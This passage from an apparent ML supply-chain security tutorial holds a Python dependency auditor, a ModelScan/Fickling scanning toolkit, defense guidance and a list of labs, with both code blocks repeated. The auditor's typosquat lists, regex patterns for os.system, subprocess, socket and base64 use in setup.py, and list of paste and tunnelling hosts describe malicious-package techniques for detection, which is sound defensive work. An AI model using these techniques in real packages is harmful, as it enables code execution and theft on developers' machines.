        path = Path(req_file)
        
        if not path.exists():
            return [{"severity": "error", "message": f"File not found: {req_file}"}]
        
        with open(path) as f:
            for line_num, line in enumerate(f, 1):
                line = line.strip()
                if not line or line.startswith('#'):
                    continue
                
                # Extract package name
                pkg_name = re.split(r'[>=<!\[;]', line)[0].strip()
                
                # Check against known typosquats
                for legit, squats in self.KNOWN_TYPOSQUATS.items():
                    if pkg_name.lower() in [s.lower() for s in squats]:
                        findings.append({
                            "severity": "critical",
                            "line": line_num,
                            "package": pkg_name,
                            "message": f"Possible typosquat of '{legit}'"
                        })
                
                # Check for pinned vs unpinned versions
                if '==' not in line and '>=' not in line:
                    findings.append({
                        "severity": "warning",
                        "line": line_num,
                        "package": pkg_name,
                        "message": "Unpinned version - vulnerable to dependency confusion"
                    })
                
                # Check for --index-url or --extra-index-url
                if '--extra-index-url' in line or '--index-url' in line:
                    findings.append({
                        "severity": "high",
                        "line": line_num,
                        "package": pkg_name,
                        "message": "Custom package index specified - verify legitimacy"
                    })
        
        return findings
    
    def audit_notebook(self, notebook_path: str) -> list[dict]:
        """Scan Jupyter notebook for dangerous installs and imports."""
        findings = []
        
        with open(notebook_path) as f:
            nb = json.load(f)
        
        for cell_idx, cell in enumerate(nb.get('cells', [])):
            if cell['cell_type'] != 'code':
                continue
            
            source = ''.join(cell.get('source', []))
            
            # Check for pip install commands
            pip_installs = re.findall(
                r'!pip install\s+(.+?)(?:\n|$)', source
            )
            for install in pip_installs:
                pkgs = install.split()
                for pkg in pkgs:
                    pkg_clean = re.split(r'[>=<!]', pkg)[0]
                    for legit, squats in self.KNOWN_TYPOSQUATS.items():
                        if pkg_clean.lower() in [s.lower() for s in squats]:
                            findings.append({
                                "severity": "critical",
                                "cell": cell_idx,
                                "message": f"Typosquat pip install: '{pkg_clean}' "
                                           f"(intended: '{legit}')"
                            })
            
            # Check for suspicious URL downloads in code
            urls = re.findall(r'https?://[^\s\'\")]+', source)
            for url in urls:
                if any(sus in url for sus in [
                    'pastebin', 'raw.github', 'gist.github',
                    'transfer.sh', 'ngrok.io'
                ]):
                    findings.append({
                        "severity": "high",
                        "cell": cell_idx,
                        "message": f"Suspicious URL in notebook: {url}"
                    })
        
        return findings


# --- Usage ---
if __name__ == "__main__":
    auditor = MLDependencyAuditor()
    
    # Audit a requirements file
    req_findings = auditor.audit_requirements("requirements.txt")
    for f in req_findings:
        severity = f["severity"].upper()
        print(f"[{severity}] Line {f.get('line', '?')}: {f['message']}")
    
    # Audit a Jupyter notebook
    nb_findings = auditor.audit_notebook("training_pipeline.ipynb")
    for f in nb_findings:
        severity = f["severity"].upper()
        print(f"[{severity}] Cell {f.get('cell', '?')}: {f['message']}")
# AI/ML dependency confusion attack demonstration
# Shows how attackers exploit Python package management in ML pipelines
import json
import re
from pathlib import Path
from typing import Optional

class MLDependencyAuditor:
    """
    Audits ML project dependencies for supply chain risks.
    Checks for known attack patterns in pip, conda, and notebook environments.
    """
    
    # Known patterns of malicious ML packages (typosquats)
    KNOWN_TYPOSQUATS = {
        "pytorch":   ["py-torch", "pytorche", "pytorch-gpu", "torch-nightly-unofficial"],
        "tensorflow":["tenserflow", "tensorflow-gpu-official", "tf-nightly-unofficial"],
        "transformers": ["transformer", "huggingface-transformers", "hf-transformers"],
        "numpy":     ["numppy", "numpy-python", "numpi"],
        "pandas":    ["panda", "pandass", "pandas-python"],
        "scikit-learn": ["sklearn", "scikit_learn", "sk-learn"],
        "tokenizers": ["tokenizer", "hf-tokenizers"],
        "safetensors": ["safe-tensors", "safetensor", "safe_tensor"],
        "accelerate": ["acclerate", "acceleratte"],
        "datasets":  ["dataset", "hf-datasets"],
    }
    
    # Suspicious setup.py patterns
    SUSPICIOUS_SETUP_PATTERNS = [
        r'os\.system\s*\(',
        r'subprocess\.(call|run|Popen)',
        r'urllib\.request\.urlretrieve',
        r'exec\s*\(',
        r'eval\s*\(',
        r'__import__\s*\(',
        r'socket\.socket',
        r'http\.server',
        r'base64\.b64decode',
    ]
    
    def audit_requirements(self, req_file: str) -> list[dict]:
        """Scan requirements.txt for supply chain risks."""
        findings = []
        path = Path(req_file)
        
        if not path.exists():
            return [{"severity": "error", "message": f"File not found: {req_file}"}]
        
        with open(path) as f:
            for line_num, line in enumerate(f, 1):
                line = line.strip()
                if not line or line.startswith('#'):
                    continue
                
                # Extract package name
                pkg_name = re.split(r'[>=<!\[;]', line)[0].strip()
                
                # Check against known typosquats
                for legit, squats in self.KNOWN_TYPOSQUATS.items():
                    if pkg_name.lower() in [s.lower() for s in squats]:
                        findings.append({
                            "severity": "critical",
                            "line": line_num,
                            "package": pkg_name,
                            "message": f"Possible typosquat of '{legit}'"
                        })
                
                # Check for pinned vs unpinned versions
                if '==' not in line and '>=' not in line:
                    findings.append({
                        "severity": "warning",
                        "line": line_num,
                        "package": pkg_name,
                        "message": "Unpinned version - vulnerable to dependency confusion"
                    })
                
                # Check for --index-url or --extra-index-url
                if '--extra-index-url' in line or '--index-url' in line:
                    findings.append({
                        "severity": "high",
                        "line": line_num,
                        "package": pkg_name,
                        "message": "Custom package index specified - verify legitimacy"
                    })
        
        return findings
    
    def audit_notebook(self, notebook_path: str) -> list[dict]:
        """Scan Jupyter notebook for dangerous installs and imports."""
        findings = []
        
        with open(notebook_path) as f:
            nb = json.load(f)
        
        for cell_idx, cell in enumerate(nb.get('cells', [])):
            if cell['cell_type'] != 'code':
                continue
            
            source = ''.join(cell.get('source', []))
            
            # Check for pip install commands
            pip_installs = re.findall(
                r'!pip install\s+(.+?)(?:\n|$)', source
            )
            for install in pip_installs:
                pkgs = install.split()
                for pkg in pkgs:
                    pkg_clean = re.split(r'[>=<!]', pkg)[0]
                    for legit, squats in self.KNOWN_TYPOSQUATS.items():
                        if pkg_clean.lower() in [s.lower() for s in squats]:
                            findings.append({
                                "severity": "critical",
                                "cell": cell_idx,
                                "message": f"Typosquat pip install: '{pkg_clean}' "
                                           f"(intended: '{legit}')"
                            })
            
            # Check for suspicious URL downloads in code
            urls = re.findall(r'https?://[^\s\'\")]+', source)
            for url in urls:
                if any(sus in url for sus in [
                    'pastebin', 'raw.github', 'gist.github',
                    'transfer.sh', 'ngrok.io'
                ]):
                    findings.append({
                        "severity": "high",
                        "cell": cell_idx,
                        "message": f"Suspicious URL in notebook: {url}"
                    })
        
        return findings


# --- Usage ---
if __name__ == "__main__":
    auditor = MLDependencyAuditor()
    
    # Audit a requirements file
    req_findings = auditor.audit_requirements("requirements.txt")
    for f in req_findings:
        severity = f["severity"].upper()
        print(f"[{severity}] Line {f.get('line', '?')}: {f['message']}")
    
    # Audit a Jupyter notebook
    nb_findings = auditor.audit_notebook("training_pipeline.ipynb")
    for f in nb_findings:
        severity = f["severity"].upper()
        print(f"[{severity}] Cell {f.get('cell', '?')}: {f['message']}")

8. Defense and Detection

A layered defense strategy is essential for securing the ML supply chain. No single tool addresses all attack vectors — organisations must combine format-level protections, scanning tools, integrity verification, and operational controls.

graph TB subgraph Prevention["Prevention Layer"] SAFET[Use Safetensors Format] HASH[Cryptographic Hash Verification] SANDBOX[Sandboxed Model Loading] SIGN[Model Signing] end subgraph Detection["Detection Layer"] MSCAN[ModelScan Analysis] FICKLE[Fickling Pickle Inspection] SBOM[ML-BOM Generation] STATIC[Static Weight Analysis] end subgraph Response["Response Layer"] QUARANTINE[Model Quarantine] ALERT[Security Alert Pipeline] ROLLBACK[Version Rollback] FORENSIC[Forensic Analysis] end SAFET --> MSCAN HASH --> MSCAN SANDBOX --> FICKLE SIGN --> SBOM MSCAN --> QUARANTINE FICKLE --> ALERT SBOM --> ROLLBACK STATIC --> FORENSIC style Prevention fill:#0f3460,stroke:#00ff41,color:#fff style Detection fill:#16213e,stroke:#0ff,color:#fff style Response fill:#1a1a2e,stroke:#ff8c00,color:#fff

ModelScan

ModelScan by Protect AI is an open-source tool that detects unsafe operations in serialized ML models. It supports pickle, PyTorch, TensorFlow, Keras, and ONNX formats. Integrate ModelScan into your CI/CD pipeline to automatically scan model artifacts before deployment.

Fickling

Fickling by Trail of Bits performs static analysis on pickle files. It can decompile pickle bytecode to equivalent Python source, enabling manual review of what the pickle file does when loaded. This is invaluable for analysing suspected backdoored models.

Safetensors Adoption

The single most impactful defence is migrating to the safetensors format. This eliminates code execution risk entirely:

  • Convert existing pickle models: from safetensors.torch import save_file
  • Load with confidence: safetensors only reads tensor data and JSON metadata
  • HuggingFace Hub now defaults to safetensors for new uploads
  • Zero-copy loading improves performance compared to pickle

Hash Verification

Always verify SHA-256 hashes of downloaded model files against the publisher's documented values. Automate this in your model download pipeline — never load a model file that has not passed integrity verification.

Sandboxed Model Loading

When you must load pickle-format models (e.g., legacy models without safetensors versions), use sandboxing:

  • Container isolation — load models inside ephemeral containers with no network access and minimal filesystem permissions.
  • gVisor or Firecracker — use microVM or sandboxed container runtimes that restrict syscall access during model loading.
  • torch.load(weights_only=True) — PyTorch 2.0+ supports loading only tensor weights without executing pickle code. Use this whenever the model architecture is already defined in code.

ML-BOM (Machine Learning Bill of Materials)

Adapting the Software BOM (SBOM) concept for ML, an ML-BOM tracks:

  • Model provenance: training data sources, framework version, training configuration
  • Artifact integrity: cryptographic hashes of all model files
  • Security scan results: output from ModelScan, Fickling, and other analysis tools
  • Dependency inventory: all Python packages and their versions in the training environment
  • Licence and compliance: data licencing, model licencing, export control classification
ml_supply_chain_defense.py
python
# Defense toolkit: scanning, verifying, and securing ML model artifacts
# Integrates ModelScan, Fickling, hash verification, and ML-BOM generation
import hashlib
import json
import subprocess
import sys
from datetime import datetime, timezone
from pathlib import Path
from typing import Optional

class MLSupplyChainDefense:
    """
    Comprehensive defense toolkit for ML supply chain security.
    Wraps multiple open-source tools into a unified scanning pipeline.
    """
    
    def __init__(self, quarantine_dir: str = "./quarantine"):
        self.quarantine_dir = Path(quarantine_dir)
        self.quarantine_dir.mkdir(parents=True, exist_ok=True)
        self.scan_results: list[dict] = []
    
    # ─── ModelScan Integration ───
    
    def run_modelscan(self, model_path: str) -> dict:
        """
        Run ModelScan (https://github.com/protectai/modelscan)
        Detects unsafe operations in serialized ML models.
        pip install modelscan
        """
        result = {
            "tool": "modelscan",
            "target": model_path,
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "status": "unknown",
            "issues": [],
        }
        
        try:
            proc = subprocess.run(
                ["modelscan", "--path", model_path, "--output", "json"],
                capture_output=True, text=True, timeout=300
            )
            
            if proc.returncode == 0:
                scan_output = json.loads(proc.stdout)
                issues = scan_output.get("issues", [])
                result["status"] = "clean" if not issues else "unsafe"
                result["issues"] = issues
            else:
                result["status"] = "error"
                result["issues"] = [{"error": proc.stderr}]
                
        except FileNotFoundError:
            result["status"] = "tool_missing"
            result["issues"] = [{"error": "modelscan not installed"}]
        except subprocess.TimeoutExpired:
            result["status"] = "timeout"
        
        self.scan_results.append(result)
        return result
    
    # ─── Fickling Integration ───
    
    def run_fickling(self, pickle_path: str) -> dict:
        """
        Run Fickling (https://github.com/trailofbits/fickling)
        Static analysis of pickle files for malicious content.
        pip install fickling
        """
        result = {
            "tool": "fickling",
            "target": pickle_path,
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "status": "unknown",
            "issues": [],
        }
        
        try:
            # Check safety
            proc = subprocess.run(
                ["fickling", "--check-safety", pickle_path],
                capture_output=True, text=True, timeout=120
            )
            
            if "unsafe" in proc.stdout.lower() or "unsafe" in proc.stderr.lower():
                result["status"] = "unsafe"
                result["issues"].append({
                    "severity": "critical",
                    "detail": proc.stdout.strip()
                })
            else:
                result["status"] = "clean"
            
            # Decompile to Python for manual review
            decompile_proc = subprocess.run(
                ["fickling", "--trace", pickle_path],
                capture_output=True, text=True, timeout=120
            )
            result["decompiled"] = decompile_proc.stdout[:5000]
            
        except FileNotFoundError:
            result["status"] = "tool_missing"
            result["issues"] = [{"error": "fickling not installed"}]
        except subprocess.TimeoutExpired:
            result["status"] = "timeout"
        
        self.scan_results.append(result)
        return result
    
    # ─── Hash Verification ───
    
    def verify_hash(
        self, model_path: str, expected_sha256: str
    ) -> dict:
        """Verify model file integrity via SHA-256."""
        result = {
            "tool": "hash_verify",
            "target": model_path,
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "expected": expected_sha256,
        }
        
        sha256 = hashlib.sha256()
        with open(model_path, 'rb') as f:
            for chunk in iter(lambda: f.read(8192), b''):
                sha256.update(chunk)
        
        actual = sha256.hexdigest()
        result["actual"] = actual
        result["match"] = actual == expected_sha256
        result["status"] = "verified" if result["match"] else "MISMATCH"
        
        if not result["match"]:
            result["issues"] = [{
                "severity": "critical",
                "detail": f"Hash mismatch: expected {expected_sha256}, got {actual}"
            }]
        
        self.scan_results.append(result)
        return result
    
    # ─── ML-BOM Generation ───
    
    def generate_mlbom(
        self, model_path: str, model_name: str,
        source_url: Optional[str] = None,
        framework: Optional[str] = None,
    ) -> dict:
        """
        Generate an ML Bill of Materials (ML-BOM) for a model artifact.
        Based on CycloneDX ML extension concepts.
        """
        path = Path(model_path)
        sha256 = hashlib.sha256()
        with open(path, 'rb') as f:
            for chunk in iter(lambda: f.read(8192), b''):
                sha256.update(chunk)
        
        mlbom = {
            "mlbom_version": "1.0",
            "generated": datetime.now(timezone.utc).isoformat(),
            "model": {
                "name": model_name,
                "file": str(path.name),
                "format": path.suffix,
                "size_bytes": path.stat().st_size,
                "sha256": sha256.hexdigest(),
            },
            "source": {
                "url": source_url or "unknown",
                "download_date": datetime.now(timezone.utc).isoformat(),
            },
            "framework": framework or "unknown",
            "security_scans": [
                {
                    "tool": r["tool"],
                    "status": r["status"],
                    "timestamp": r["timestamp"],
                }
                for r in self.scan_results
                if r["target"] == model_path
            ],
        }
        
        # Save ML-BOM alongside model
        bom_path = path.with_suffix('.mlbom.json')
        with open(bom_path, 'w') as f:
            json.dump(mlbom, f, indent=2)
        
        return mlbom
    
    # ─── Quarantine ───
    
    def quarantine_model(self, model_path: str, reason: str) -> str:
        """Move a suspicious model to quarantine directory."""
        src = Path(model_path)
        dest = self.quarantine_dir / f"{src.stem}_quarantined{src.suffix}"
        src.rename(dest)
        
        # Write quarantine metadata
        meta = {
            "original_path": str(src),
            "quarantined_at": datetime.now(timezone.utc).isoformat(),
            "reason": reason,
        }
        meta_path = dest.with_suffix('.quarantine.json')
        with open(meta_path, 'w') as f:
            json.dump(meta, f, indent=2)
        
        return str(dest)
    
    # ─── Full Pipeline ───
    
    def full_scan_pipeline(
        self, model_path: str, expected_hash: Optional[str] = None
    ) -> dict:
        """Run complete supply chain security scan pipeline."""
        results = {"model": model_path, "scans": []}
        
        # Step 1: Hash check (if expected hash provided)
        if expected_hash:
            hash_result = self.verify_hash(model_path, expected_hash)
            results["scans"].append(hash_result)
            if hash_result["status"] == "MISMATCH":
                quarantine_path = self.quarantine_model(
                    model_path, "Hash verification failed"
                )
                results["quarantined"] = quarantine_path
                return results
        
        # Step 2: Format-specific scanning
        path = Path(model_path)
        if path.suffix in ('.pt', '.pth', '.bin', '.pkl'):
            results["scans"].append(self.run_modelscan(model_path))
            results["scans"].append(self.run_fickling(model_path))
        elif path.suffix == '.safetensors':
            results["scans"].append(self.run_modelscan(model_path))
        elif path.suffix == '.gguf':
            results["scans"].append({"tool": "gguf_check", "status": "safe"})
        
        # Step 3: Quarantine if any scan found issues
        has_issues = any(
            s.get("status") in ("unsafe", "MISMATCH")
            for s in results["scans"]
        )
        if has_issues:
            quarantine_path = self.quarantine_model(
                model_path, "Security scan detected issues"
            )
            results["quarantined"] = quarantine_path
        
        return results


# --- Usage ---
if __name__ == "__main__":
    defense = MLSupplyChainDefense()
    
    model = sys.argv[1] if len(sys.argv) > 1 else "model.pt"
    expected = sys.argv[2] if len(sys.argv) > 2 else None
    
    print(f"Scanning: {model}")
    result = defense.full_scan_pipeline(model, expected)
    print(json.dumps(result, indent=2))
    
    # Generate ML-BOM
    bom = defense.generate_mlbom(
        model, "example-model",
        source_url="https://huggingface.co/example/model",
        framework="pytorch"
    )
    print(f"\nML-BOM generated: {json.dumps(bom, indent=2)}")
# Defense toolkit: scanning, verifying, and securing ML model artifacts
# Integrates ModelScan, Fickling, hash verification, and ML-BOM generation
import hashlib
import json
import subprocess
import sys
from datetime import datetime, timezone
from pathlib import Path
from typing import Optional

class MLSupplyChainDefense:
    """
    Comprehensive defense toolkit for ML supply chain security.
    Wraps multiple open-source tools into a unified scanning pipeline.
    """
    
    def __init__(self, quarantine_dir: str = "./quarantine"):
        self.quarantine_dir = Path(quarantine_dir)
        self.quarantine_dir.mkdir(parents=True, exist_ok=True)
        self.scan_results: list[dict] = []
    
    # ─── ModelScan Integration ───
    
    def run_modelscan(self, model_path: str) -> dict:
        """
        Run ModelScan (https://github.com/protectai/modelscan)
        Detects unsafe operations in serialized ML models.
        pip install modelscan
        """
        result = {
            "tool": "modelscan",
            "target": model_path,
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "status": "unknown",
            "issues": [],
        }
        
        try:
            proc = subprocess.run(
                ["modelscan", "--path", model_path, "--output", "json"],
                capture_output=True, text=True, timeout=300
            )
            
            if proc.returncode == 0:
                scan_output = json.loads(proc.stdout)
                issues = scan_output.get("issues", [])
                result["status"] = "clean" if not issues else "unsafe"
                result["issues"] = issues
            else:
                result["status"] = "error"
                result["issues"] = [{"error": proc.stderr}]
                
        except FileNotFoundError:
            result["status"] = "tool_missing"
            result["issues"] = [{"error": "modelscan not installed"}]
        except subprocess.TimeoutExpired:
            result["status"] = "timeout"
        
        self.scan_results.append(result)
        return result
    
    # ─── Fickling Integration ───
    
    def run_fickling(self, pickle_path: str) -> dict:
        """
        Run Fickling (https://github.com/trailofbits/fickling)
        Static analysis of pickle files for malicious content.
        pip install fickling
        """
        result = {
            "tool": "fickling",
            "target": pickle_path,
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "status": "unknown",
            "issues": [],
        }
        
        try:
            # Check safety
            proc = subprocess.run(
                ["fickling", "--check-safety", pickle_path],
                capture_output=True, text=True, timeout=120
            )
            
            if "unsafe" in proc.stdout.lower() or "unsafe" in proc.stderr.lower():
                result["status"] = "unsafe"
                result["issues"].append({
                    "severity": "critical",
                    "detail": proc.stdout.strip()
                })
            else:
                result["status"] = "clean"
            
            # Decompile to Python for manual review
            decompile_proc = subprocess.run(
                ["fickling", "--trace", pickle_path],
                capture_output=True, text=True, timeout=120
            )
            result["decompiled"] = decompile_proc.stdout[:5000]
            
        except FileNotFoundError:
            result["status"] = "tool_missing"
            result["issues"] = [{"error": "fickling not installed"}]
        except subprocess.TimeoutExpired:
            result["status"] = "timeout"
        
        self.scan_results.append(result)
        return result
    
    # ─── Hash Verification ───
    
    def verify_hash(
        self, model_path: str, expected_sha256: str
    ) -> dict:
        """Verify model file integrity via SHA-256."""
        result = {
            "tool": "hash_verify",
            "target": model_path,
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "expected": expected_sha256,
        }
        
        sha256 = hashlib.sha256()
        with open(model_path, 'rb') as f:
            for chunk in iter(lambda: f.read(8192), b''):
                sha256.update(chunk)
        
        actual = sha256.hexdigest()
        result["actual"] = actual
        result["match"] = actual == expected_sha256
        result["status"] = "verified" if result["match"] else "MISMATCH"
        
        if not result["match"]:
            result["issues"] = [{
                "severity": "critical",
                "detail": f"Hash mismatch: expected {expected_sha256}, got {actual}"
            }]
        
        self.scan_results.append(result)
        return result
    
    # ─── ML-BOM Generation ───
    
    def generate_mlbom(
        self, model_path: str, model_name: str,
        source_url: Optional[str] = None,
        framework: Optional[str] = None,
    ) -> dict:
        """
        Generate an ML Bill of Materials (ML-BOM) for a model artifact.
        Based on CycloneDX ML extension concepts.
        """
        path = Path(model_path)
        sha256 = hashlib.sha256()
        with open(path, 'rb') as f:
            for chunk in iter(lambda: f.read(8192), b''):
                sha256.update(chunk)
        
        mlbom = {
            "mlbom_version": "1.0",
            "generated": datetime.now(timezone.utc).isoformat(),
            "model": {
                "name": model_name,
                "file": str(path.name),
                "format": path.suffix,
                "size_bytes": path.stat().st_size,
                "sha256": sha256.hexdigest(),
            },
            "source": {
                "url": source_url or "unknown",
                "download_date": datetime.now(timezone.utc).isoformat(),
            },
            "framework": framework or "unknown",
            "security_scans": [
                {
                    "tool": r["tool"],
                    "status": r["status"],
                    "timestamp": r["timestamp"],
                }
                for r in self.scan_results
                if r["target"] == model_path
            ],
        }
        
        # Save ML-BOM alongside model
        bom_path = path.with_suffix('.mlbom.json')
        with open(bom_path, 'w') as f:
            json.dump(mlbom, f, indent=2)
        
        return mlbom
    
    # ─── Quarantine ───
    
    def quarantine_model(self, model_path: str, reason: str) -> str:
        """Move a suspicious model to quarantine directory."""
        src = Path(model_path)
        dest = self.quarantine_dir / f"{src.stem}_quarantined{src.suffix}"
        src.rename(dest)
        
        # Write quarantine metadata
        meta = {
            "original_path": str(src),
            "quarantined_at": datetime.now(timezone.utc).isoformat(),
            "reason": reason,
        }
        meta_path = dest.with_suffix('.quarantine.json')
        with open(meta_path, 'w') as f:
            json.dump(meta, f, indent=2)
        
        return str(dest)
    
    # ─── Full Pipeline ───
    
    def full_scan_pipeline(
        self, model_path: str, expected_hash: Optional[str] = None
    ) -> dict:
        """Run complete supply chain security scan pipeline."""
        results = {"model": model_path, "scans": []}
        
        # Step 1: Hash check (if expected hash provided)
        if expected_hash:
            hash_result = self.verify_hash(model_path, expected_hash)
            results["scans"].append(hash_result)
            if hash_result["status"] == "MISMATCH":
                quarantine_path = self.quarantine_model(
                    model_path, "Hash verification failed"
                )
                results["quarantined"] = quarantine_path
                return results
        
        # Step 2: Format-specific scanning
        path = Path(model_path)
        if path.suffix in ('.pt', '.pth', '.bin', '.pkl'):
            results["scans"].append(self.run_modelscan(model_path))
            results["scans"].append(self.run_fickling(model_path))
        elif path.suffix == '.safetensors':
            results["scans"].append(self.run_modelscan(model_path))
        elif path.suffix == '.gguf':
            results["scans"].append({"tool": "gguf_check", "status": "safe"})
        
        # Step 3: Quarantine if any scan found issues
        has_issues = any(
            s.get("status") in ("unsafe", "MISMATCH")
            for s in results["scans"]
        )
        if has_issues:
            quarantine_path = self.quarantine_model(
                model_path, "Security scan detected issues"
            )
            results["quarantined"] = quarantine_path
        
        return results


# --- Usage ---
if __name__ == "__main__":
    defense = MLSupplyChainDefense()
    
    model = sys.argv[1] if len(sys.argv) > 1 else "model.pt"
    expected = sys.argv[2] if len(sys.argv) > 2 else None
    
    print(f"Scanning: {model}")
    result = defense.full_scan_pipeline(model, expected)
    print(json.dumps(result, indent=2))
    
    # Generate ML-BOM
    bom = defense.generate_mlbom(
        model, "example-model",
        source_url="https://huggingface.co/example/model",
        framework="pytorch"
    )
    print(f"\nML-BOM generated: {json.dumps(bom, indent=2)}")
🎯

AI Supply Chain Security Labs

Hands-on exercises for identifying, scanning, and defending against AI supply chain attacks. These labs build practical detection and defense skills.

🔧
Pickle Model File Analysis and Scanning Custom Lab medium
Pickle opcode inspection with pickletoolsFickling static analysisModelScan automated scanningSafetensors conversion and verification
🔧
HuggingFace Supply Chain Audit Custom Lab hard
Model repository provenance analysisTyposquat detection scriptingtrust_remote_code security reviewML-BOM generation for downloaded models
🔧
ML Dependency Confusion Attack Simulation Custom Lab hard
Private package namespace auditingRequirements.txt typosquat scanningNotebook pip install analysisPip configuration hardening with index-url restrictions